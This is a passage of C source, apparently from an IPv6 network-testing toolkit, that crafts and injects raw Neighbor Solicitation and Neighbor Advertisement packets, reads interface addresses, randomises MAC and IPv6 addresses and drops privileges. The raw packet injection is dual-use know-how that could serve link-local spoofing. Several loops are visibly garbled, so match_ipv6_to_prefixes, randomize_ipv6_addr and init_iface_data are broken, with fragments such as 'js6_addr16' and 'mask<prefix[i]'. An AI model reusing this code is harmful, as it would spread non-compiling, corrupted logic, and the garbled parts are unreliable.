volatile unsigned int tries=0; unsigned int foundaddr=0; struct sigaction new_sig, old_sig; int result; unsigned char error_f=0; size_t nw; ns_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(idata->pfd, &pcap_filter, PCAP_ICMPV6_NA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(idata->pfd)); return(-1); } if(pcap_setfilter(idata->pfd, &pcap_filter) == -1){ if(idata->verbose_f>1) printf("pcap_setfilter(): %s", pcap_geterr(idata->pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->ip6_local; ipv6->ip6_dst= solicited_node(targetaddr); ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Neighbor Solicitation header"); return(-1); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = *targetaddr; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("NS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy( &(idata->ether.a), sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; bzero(&new_sig, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundaddr && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=1; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=1; break; } alarm(idata->local_timeout); while(!foundaddr && !error_f){ do{ if( (result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=1; break; } }while(result==0); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_na = (struct nd_neighbor_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_na+ pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_na + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Neighbor Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_na) < (sizeof(struct nd_neighbor_advert) + \ sizeof(struct nd_opt_tlla))) continue; /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255) continue; /* Check that that the Destination Address of the Neighbor Advertisement is the one that we used for sending the Neighbor Solicitation message */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))) continue; /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_na, pkt_end-((unsigned char *)pkt_na), IPPROTO_ICMPV6) != 0) continue; /* Check that the ICMPv6 Target Address is the one we had asked for */ if(!is_eq_in6_addr(&(pkt_na->nd_na_target), targetaddr)) continue; p= (unsigned char *) pkt_na + sizeof(struct nd_neighbor_advert); /* Process Neighbor Advertisement options */ while( (p+sizeof(struct nd_opt_tlla)) <= pkt_end && (*(p+1) != 0)){ if(*p == ND_OPT_TARGET_LINKADDR){ if( (*(p+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ *result_ether= *(struct ether_addr *) (p+2); foundaddr=1; break; } p= p + *(p+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Neighbor Solicitations */ alarm(0); if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(foundaddr) return 1; else return 0; } /* * Function: solicited_node() * * Obtains the Solicited-node multicast address corresponding to an IPv6 address. */ struct in6_addr solicited_node(const struct in6_addr *ipv6addr){ struct in6_addr solicited; solicited.s6_addr16[0]= htons(0xff02); solicited.s6_addr16[1]= 0x0000; solicited.s6_addr16[2]= 0x0000; solicited.s6_addr16[3]= 0x0000; solicited.s6_addr16[4]= 0x0000; solicited.s6_addr16[5]= htons(0x0001); solicited.s6_addr16[6]= htons(0xff00) | ipv6addr->s6_addr16[6]; solicited.s6_addr16[7]= ipv6addr->s6_addr16[7]; return solicited; } /* * Function: is_eq_in6_addr() * * Compares two IPv6 addresses. Returns 0 if they are equal. */ int is_eq_in6_addr(struct in6_addr *ip1, struct in6_addr *ip2){ unsigned int i; for(i=0; i<8; i++) if(ip1->s6_addr16[i] != ip2->s6_addr16[i]) return 0; return 1; } /* * Function: generate_slaac_address() * * Generates an IPv6 address (with modified EUI-64 identifiers) based on * a IPv6 prefix and an Ethernet address. */ void generate_slaac_address(struct in6_addr *prefix, struct ether_addr *etheraddr, struct in6_addr *ipv6addr){ unsigned int i; ipv6addr->s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=0;i<4;i++) ipv6addr->s6_addr16[i]= prefix->s6_addr16[i]; ipv6addr->s6_addr16[4]= htons(((u_int16_t) (etheraddr->a[0] | 0x02) << 8) | etheraddr->a[1]); ipv6addr->s6_addr16[5]= htons( ((u_int16_t)etheraddr->a[2] << 8) | 0xff); ipv6addr->s6_addr16[6]= htons((u_int16_t) 0xfe00 | etheraddr->a[3]); ipv6addr->s6_addr16[7]= htons(((u_int16_t)etheraddr->a[4] << 8) | etheraddr->a[5]); } /* * Function: get_if_addrs() * * Obtains Ethernet and IPv6 addresses of a network interface card */ int get_if_addrs(struct iface_data *idata){ struct ifaddrs *ifptr, *ptr; struct sockaddr_in6 *sockin6ptr; #ifdef __linux__ struct sockaddr_ll *sockpptr; #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) struct sockaddr_dl *sockpptr; #endif if(getifaddrs(&ifptr) != 0){ if(idata->verbose_f > 1){ printf("Error while learning addresses of the %s interface\n", idata->iface); } return(-1); } for(ptr=ifptr; ptr != NULL; ptr= ptr->ifa_next){ if(ptr->ifa_addr == NULL) continue; #ifdef __linux__ if( !(idata->ether_flag) && ((ptr->ifa_addr)->sa_family == AF_PACKET)){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ sockpptr = (struct sockaddr_ll *) (ptr->ifa_addr); if(sockpptr->sll_halen == ETHER_ADDR_LEN){ memcpy((idata->ether).a, sockpptr->sll_addr, ETHER_ADDR_LEN); idata->ether_flag=1; } } } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) if( !(idata->ether_flag) && ((ptr->ifa_addr)->sa_family == AF_LINK)){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ sockpptr = (struct sockaddr_dl *) (ptr->ifa_addr); if(sockpptr->sdl_alen == ETHER_ADDR_LEN){ memcpy((idata->ether).a, (sockpptr->sdl_data + sockpptr->sdl_nlen), ETHER_ADDR_LEN); idata->ether_flag= 1; } } } #endif else if((ptr->ifa_addr)->sa_family == AF_INET6){ sockin6ptr= (struct sockaddr_in6 *) (ptr->ifa_addr); if( !(idata->ip6_local_flag) && (((sockin6ptr->sin6_addr).s6_addr16[0] & htons(0xffc0)) \ == htons(0xfe80))){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ idata->ip6_local = sockin6ptr->sin6_addr; #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) /* BSDs store the interface index in s6_addr16[1], so we must clear it */ idata->ip6_local.s6_addr16[1] =0; idata->ip6_local.s6_addr16[2] =0; idata->ip6_local.s6_addr16[3] =0; #endif idata->ip6_local_flag= 1; } } else if( ((sockin6ptr->sin6_addr).s6_addr16[0] & htons(0xffc0)) != htons(0xfe80)){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ if(IN6_IS_ADDR_LOOPBACK(&(sockin6ptr->sin6_addr))) idata->flags= IFACE_LOOPBACK; if(!is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(idata->ip6_global))){ if(idata->ip6_global.nprefix < idata->ip6_global.maxprefix){ if( (idata->ip6_global.prefix[idata->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(-1); } (idata->ip6_global.prefix[idata->ip6_global.nprefix])->len = 64; (idata->ip6_global.prefix[idata->ip6_global.nprefix])->ip6 = sockin6ptr->sin6_addr; idata->ip6_global.nprefix++; idata->ip6_global_flag= 1; } } } } } } freeifaddrs(ifptr); return(0); } /* * Function: is_ip6_in_address_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_address_list(struct prefix_list *plist, struct in6_addr *target){ unsigned int i, j; for(i=0; i < plist->nprefix; i++){ for(j=0; j < 8; j++){ if(target->s6_addr16[j] != (plist->prefix[i])->ip6.s6_addr16[j]) break; } if(j == 8) return 1; } return 0; } /* * Function: is_ip6_in_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_prefix_list(struct in6_addr *target, struct prefix_list *plist){ unsigned int i, j, full16, rest16; u_int16_t mask16; for(i=0; i < plist->nprefix; i++){ full16=(plist->prefix[i])->len / 16; rest16=(plist->prefix[i])->len % 16; mask16 = 0xffff; for(j=0; j < full16; j++) if(target->s6_addr16[j] != (plist->prefix[i])->ip6.s6_addr16[j]) break; if(j == full16){ if(rest16 == 0) return 1; else{ mask16 = mask16 << (16 - rest16); if( (target->s6_addr16[full16] & mask16) == ((plist->prefix[i])->ip6.s6_addr16[full16] & mask16)) return 1; } } } return 0; } /* * Function: is_time_elapsed() * * Checks whether a specific amount of time has elapsed. (i.e., whether curtime >= lastprobe + delta */ int is_time_elapsed(struct timeval *curtime, struct timeval *lastprobe, unsigned long delta){ if( curtime->tv_sec > (lastprobe->tv_sec + delta / 1000000) ){ return(1); }else if( curtime->tv_sec == (lastprobe->tv_sec + delta / 1000000)){ if( curtime->tv_usec > (lastprobe->tv_usec + delta % 1000000) ){ return(1); } } return(0); } /* * match_ipv6_to_prefixes() * * Finds out whether an IPv6 address matches any IPv6 prefix in an array */ int match_ipv6_to_prefixes(struct in6_addr *ipv6addr, struct prefix_list *pf){ unsigned int i, j, full16, rbits; u_int16_t mask; for(i=0; i < pf->nprefix; i++){ full16= (pf->prefix[i])->len/16; for(j=0; js6_addr16[j] != (pf->prefix[i])->ip6.s6_addr16[j]) break; } if(j == full16){ if((rbits= (pf->prefix[i])->len%16) == 0) return 1; else{ mask= 0xffff; mask= mask<prefix[i])->ip6.s6_addr16[full16] == (ipv6addr->s6_addr16[full16] & htons(mask))) return 1; } } } return 0; } /* * Function: print_filters() * * Prints the filters that will be applied to incoming packets. */ void print_filters(struct iface_data *idata, struct filters *filters){ unsigned int i; char plinkaddr[ETHER_ADDR_PLEN]; char pv6addr[INET6_ADDRSTRLEN]; if(filters->nblocksrc){ printf("Block filter for IPv6 Source Addresss: "); for(i=0; i< filters->nblocksrc; i++){ if(inet_ntop(AF_INET6, &(filters->blocksrc[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Src. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blocksrclen[i]); } printf("\n"); } if(filters->nblockdst){ printf("Block filter for IPv6 Destination Address: "); for(i=0; i< filters->nblockdst; i++){ if(inet_ntop(AF_INET6, &(filters->blockdst[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Dst. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blockdstlen[i]); } printf("\n"); } if(filters->nblocktarget){ printf("Block filter for Target Address: "); for(i=0; i< filters->nblocktarget; i++){ if(inet_ntop(AF_INET6, &(filters->blocktarget[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Target Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blocktargetlen[i]); } printf("\n"); } if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ if(filters->nblocklinksrc){ printf("Block filter for link-layer Source Address: "); for(i=0; i < filters->nblocklinksrc; i++){ if(ether_ntop(&(filters->blocklinksrc[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } if(filters->nblocklinkdst){ printf("Block filter for link-layer Destination Address: "); for(i=0; i < filters->nblocklinkdst; i++){ if(ether_ntop(&(filters->blocklinkdst[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } } if(filters->nacceptsrc){ printf("Accept filter for IPv6 Source Addresss: "); for(i=0; i < filters->nacceptsrc; i++){ if(inet_ntop(AF_INET6, &(filters->acceptsrc[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Src. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->acceptsrclen[i]); } printf("\n"); } if(filters->nacceptdst){ printf("Accept filter for IPv6 Destination Address: "); for(i=0; i < filters->nacceptdst; i++){ if(inet_ntop(AF_INET6, &(filters->acceptdst[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Dst. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->acceptdstlen[i]); } printf("\n"); } if(filters->naccepttarget){ printf("Accept filter for Target Address: "); for(i=0; i < filters->naccepttarget; i++){ if(inet_ntop(AF_INET6, &(filters->accepttarget[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Target Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->accepttargetlen[i]); } printf("\n"); } if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ if(filters->nacceptlinksrc){ printf("Accept filter for link-layer Source Address: "); for(i=0; i < filters->nacceptlinksrc; i++){ if(ether_ntop(&(filters->acceptlinksrc[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } if(filters->nacceptlinkdst){ printf("Accept filter for link-layer Destination Address: "); for(i=0; i < filters->nacceptlinkdst; i++){ if(ether_ntop(&(filters->acceptlinkdst[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } } } /* * Function: print_filter_result() * * Prints infromation about an incoming packet and whether it was blocked or * accepted by a filter. */ void print_filter_result(struct iface_data *idata, const u_char *pkt_data, unsigned char fresult){ struct ip6_hdr *pkt_ipv6; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN]; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_data + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_dst), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("Received IPv6 packet from %s to %s (%s)\n", psrcaddr, pdstaddr, \ ((fresult == ACCEPTED)?"accepted":"blocked") ); } /* * randomize_ether_addr() * * Select a random Ethernet address. */ void randomize_ether_addr(struct ether_addr *ethaddr){ unsigned int i; for(i=0; i<6; i++) ethaddr->a[i]= random(); ethaddr->a[0]= (ethaddr->a[0] & 0xfc) | 0x02; } /* * randomize_ipv6_addr() * * Select a random IPv6 from a given prefix. */ void randomize_ipv6_addr(struct in6_addr *ipv6addr, struct in6_addr *prefix, u_int8_t preflen){ u_int16_t mask; u_int8_t startrand; unsigned int i; startrand= preflen/16; for(i=0; is6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6addr->s6_addr16[i]=random(); if(preflen%16){ mask=0xffff; for(i=0; i<(preflen%16); i++) mask= mask>>1; ipv6addr->s6_addr16[startrand]= ipv6addr->s6_addr16[startrand] & htons(mask); } for(i=0; i<=(preflen/16); i++) ipv6addr->s6_addr16[i]= ipv6addr->s6_addr16[i] | prefix->s6_addr16[i]; } /* * release_privileges() * * Releases superuser privileges by switching to the real uid and gid, or to nobody */ void release_privileges(void){ uid_t ruid; gid_t rgid; struct passwd *pwdptr; /* If the real UID is not root, we setuid() and setgid() to that user and group, releasing superuser privileges. Otherwise, if the real UID is 0, we try to setuid() to "nobody", releasing superuser privileges. */ if( (ruid=getuid()) && (rgid=getgid())){ if(setgid(rgid) == -1){ puts("Error while releasing superuser privileges (changing to real GID)"); exit(EXIT_FAILURE); } if(setuid(ruid) == -1){ puts("Error while releasing superuser privileges (changing to real UID)"); exit(EXIT_FAILURE); } } else{ if((pwdptr=getpwnam("nobody"))){ if(!pwdptr->pw_uid || !pwdptr->pw_gid){ puts("User 'nobody' has incorrect privileges"); exit(EXIT_FAILURE); } if(setgid(pwdptr->pw_gid) == -1){ puts("Error while releasing superuser privileges (changing to nobody's group)"); exit(EXIT_FAILURE); } if(setuid(pwdptr->pw_uid) == -1){ puts("Error while releasing superuser privileges (changing to 'nobody')"); exit(EXIT_FAILURE); } } } } /* * sanitize_ipv6_prefix() * * Clears those bits in an IPv6 address that are not within a prefix length. */ void sanitize_ipv6_prefix(struct in6_addr *ipv6addr, u_int8_t prefixlen){ unsigned int skip, i; u_int16_t mask; skip= (prefixlen+15)/16; if(prefixlen%16){ mask=0; for(i=0; i<(prefixlen%16); i++) mask= (mask>>1) | 0x8000; ipv6addr->s6_addr16[skip-1]= ipv6addr->s6_addr16[skip-1] & htons(mask); } for(i=skip;i<8;i++) ipv6addr->s6_addr16[i]=0; } /* * Handler for the ALARM signal. * * Used for setting a timeout on libpcap reads */ void sig_alarm(int num){ if(canjump == 0) return; siglongjmp(env, 1); } /* * Function: src_addr_sel2() * * Selects a Source Address for a given Destination Address (old function) */ struct in6_addr *sel_src_addr_ra(struct iface_data *idata, struct in6_addr *dst){ u_int16_t mask16; unsigned int i, j, full16, rest16; /* If the destination address is a link-local address, we select our link-local address as the Source Address. If the dst address is a global unicast address we select our first matching address, or else our first global address. Worst case scenario, we don't have global address and must use our link-local address. */ if( (dst->s6_addr16[0] & htons(0xffc0)) == htons(0xfe80)){ return( &(idata->ip6_local)); } else if(IN6_IS_ADDR_MC_LINKLOCAL(dst) || IN6_IS_ADDR_LINKLOCAL(dst)){ return( &(idata->ip6_local)); } else if(idata->ip6_global_flag){ for(i=0; i < idata->ip6_global.nprefix; i++){ full16=(idata->ip6_global.prefix[i])->len / 16; rest16=(idata->ip6_global.prefix[i])->len % 16; mask16 = 0xffff; for(j=0; j < full16; j++) if( dst->s6_addr16[j] != (idata->ip6_global.prefix[i])->ip6.s6_addr16[j]) break; if( (j == full16) && rest16){ mask16 = mask16 << (16 - rest16); if( (dst->s6_addr16[full16] & mask16) == ((idata->ip6_global.prefix[i])->ip6.s6_addr16[full16] & mask16)) return( &((idata->ip6_global.prefix[i])->ip6)); } } return( &((idata->ip6_global.prefix[0])->ip6)); } else{ return( &(idata->ip6_local)); } } /* * Function: send_neighbor_advertisement() * * Send a Neighbor advertisement in response to a Neighbor Solicitation message */ int send_neighbor_advert(struct iface_data *idata, pcap_t *pfd, const u_char *pktdata){ unsigned int i; size_t nw; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_neighbor_solicit *pkt_ns; unsigned char *ptr; struct ether_header *ethernet; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_neighbor_advert *na; struct nd_opt_tlla *tllaopt; struct in6_addr *pkt_ipv6addr; unsigned char wbuffer[2500]; if(idata->mtu > sizeof(wbuffer)){ if(idata->verbose_f) puts("send_neighbor_advert(): Internal buffer too small"); return(-1); } ethernet= (struct ether_header *) wbuffer; v6buffer = (unsigned char *) ethernet + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; na= (struct nd_neighbor_advert *) ((char *) v6buffer + MIN_IPV6_HLEN); ptr = (unsigned char *) na; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); ethernet->ether_type = htons(ETHERTYPE_IPV6); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_nxt= IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_advert)) > (v6buffer+idata->mtu)){ if(idata->verbose_f) puts("send_neighbor_advert(): Packet too large when sending Neighbor Advertisement"); return(-1); } na->nd_na_type = ND_NEIGHBOR_ADVERT; na->nd_na_code = 0; ptr += sizeof(struct nd_neighbor_advert); if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer+idata->mtu) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; bcopy(idata->ether.a, tllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ if(idata->verbose_f) puts("send_neighbor_advert(): Packet Too Large while inserting TLLA option in NA message"); return(-1); } /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ na->nd_na_flags_reserved = 0; if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ if(idata->verbose_f) puts("send_neighbor_advert(): Error converting all-nodes multicast address"); return(-1); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ if(idata->verbose_f) puts("send_neighbor_advert(): Error converting all-nodes link-local address"); return(-1); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; /* Set the "Solicited" flag if NS was sent from an address other than the unspecified address (i.e., the response will be unicast). */ na->nd_na_flags_reserved = ND_NA_FLAG_OVERRIDE | ND_NA_FLAG_SOLICITED; } ethernet->src = idata->ether; /* If the Neighbor Solicitation message was directed to one of our unicast addresses, the IPv6 Source Address is set to that address. Otherwise, we set the IPv6 Source Address to our link-local address. */ pkt_ipv6addr = &(pkt_ipv6->ip6_dst); if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src = idata->ip6_local; } else{ if(is_eq_in6_addr(pkt_ipv6addr, &(idata->ip6_local))){ ipv6->ip6_src = idata->ip6_local; } else if(idata->ip6_global_flag){ for(i=0; i < idata->ip6_global.nprefix; i++){ if(is_eq_in6_addr(pkt_ipv6addr, &((idata->ip6_global.prefix[i])->ip6))){ ipv6->ip6_src = (idata->ip6_global.prefix[i])->ip6; break; } } if(i == idata->ip6_global.nprefix) return 0; } else{ return 0; } } na->nd_na_target= pkt_ns->nd_ns_target; na->nd_na_cksum = 0; na->nd_na_cksum = in_chksum(v6buffer, na, ptr-((unsigned char *)na), IPPROTO_ICMPV6); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(pfd, wbuffer, ptr - wbuffer)) == -1){ if(idata->verbose_f) printf("send_neighbor_advert(): pcap_inject(): %s", pcap_geterr(pfd)); return(-1); } if(nw != (ptr-wbuffer)){ if(idata->verbose_f) printf("send_neighbor_advert(): pcap_inject(): only wrote %lu bytes " "(rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-wbuffer)); return(-1); } return 0; } /* * Function: string_escapes() * * Replace some escape sequences in a string */ int string_escapes(char *data, unsigned int *datalen, unsigned int maxlen){ char *org, *dst; org=data; dst=data; while(org < (data+ *datalen) && dst <= (data+maxlen)){ if(*org == '\\'){ if((org+1) < (data+ *datalen)){ org++; switch(*org){ case '\\': *dst= '\\'; break; case 'n': *dst= CHAR_LF; break; case 'r': *dst= CHAR_CR; break; default: return 0; } } else *dst= *org; } else{ if(org != dst) *dst = *org; } org++; dst++; } *datalen= dst - data; return 1; } /* * Function: Strnlen() * * Our own version of strnlen(), since some OSes do not support it. */ size_t Strnlen(const char *s, size_t maxlen){ size_t i=0; while(s[i] != 0 && i < maxlen) i++; if(i < maxlen) return(i); else return(maxlen); } /* * Function: init_iface_data() * * Initializes the contents of "iface_data" structure */ int init_iface_data(struct iface_data *idata){ unsigned int i; memset(idata, 0, sizeof(struct iface_data)); idata->mtu= ETH_DATA_LEN; idata->local_retrans = 0; idata->local_timeout = 1; if( (idata->ip6_global.prefix= malloc(MAX_LOCAL_ADDRESSES * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->ip6_global.nprefix=0; idata->ip6_global.maxprefix= MAX_LOCAL_ADDRESSES; if( (idata->prefix_ol.prefix= malloc(MAX_PREFIXES_ONLINK * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->prefix_ol.nprefix= 0; idata->prefix_ol.maxprefix= MAX_PREFIXES_ONLINK; if( (idata->prefix_ac.prefix= malloc(MAX_PREFIXES_AUTO * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->prefix_ac.nprefix= 0; idata->prefix_ac.maxprefix= MAX_PREFIXES_AUTO; if( ((idata->iflist).ifaces= malloc(sizeof(struct iface_entry) * MAX_IFACES)) == NULL) return(FAILURE); memset((idata->iflist).ifaces, 0, sizeof(struct iface_entry) * MAX_IFACES); idata->iflist.nifaces=0; idata->iflist.maxifaces= MAX_IFACES; for(i=0; iiflist).ifaces[i].ip6_global.prefix= malloc( sizeof(struct prefix_entry *) * MAX_LOCAL_ADDRESSES)) == NULL){ return(FAILURE); } (idata->iflist).ifaces[i].ip6_global.maxprefix= MAX_LOCAL_ADDRESSES; if( ((idata->iflist).ifaces[i].ip6_local.prefix= malloc( sizeof(struct prefix_entry *) * MAX_LOCAL_ADDRESSES)) == NULL){ return(FAILURE); } (idata->iflist).ifaces[i].ip6_local.maxprefix= MAX_LOCAL_ADDRESSES; } return SUCCESS; } /* * Function: init_filters() * * Initializes a filters structure, and allocates memory for the filter data. */ int init_filters(struct filters *filters){ memset(filters, 0, sizeof(struct filters)); if( (filters->blocksrc= malloc(sizeof(struct in6_addr) * MAX_BLOCK_SRC)) == NULL) return(-1); if( (filters->blockdst= malloc(sizeof(struct in6_addr) * MAX_BLOCK_DST)) == NULL) return(-1); if( (filters->blocktarget= malloc(sizeof(struct in6_addr) * MAX_BLOCK_TARGET)) == NULL) return(-1); if( (filters->blocklinksrc= malloc(sizeof(struct ether_addr) * MAX_BLOCK_LINK_SRC)) == NULL) return(-1); if( (filters->blocklinkdst= malloc(sizeof(struct ether_addr) * MAX_BLOCK_LINK_DST)) == NULL) return(-1); if( (filters->blocksrclen= malloc(sizeof(u_int8_t) * MAX_BLOCK_SRC)) == NULL) return(-1); if( (filters->blockdstlen= malloc(sizeof(u_int8_t) * MAX_BLOCK_DST)) == NULL) return(-1); if( (filters->blocktargetlen= malloc(sizeof(u_int8_t) * MAX_BLOCK_TARGET)) == NULL) return(-1); if( (filters->acceptsrc= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_SRC)) == NULL) return(-1); if( (filters->acceptdst= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_DST)) == NULL) return(-1); if( (filters->accepttarget= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_TARGET)) == NULL) return(-1); if( 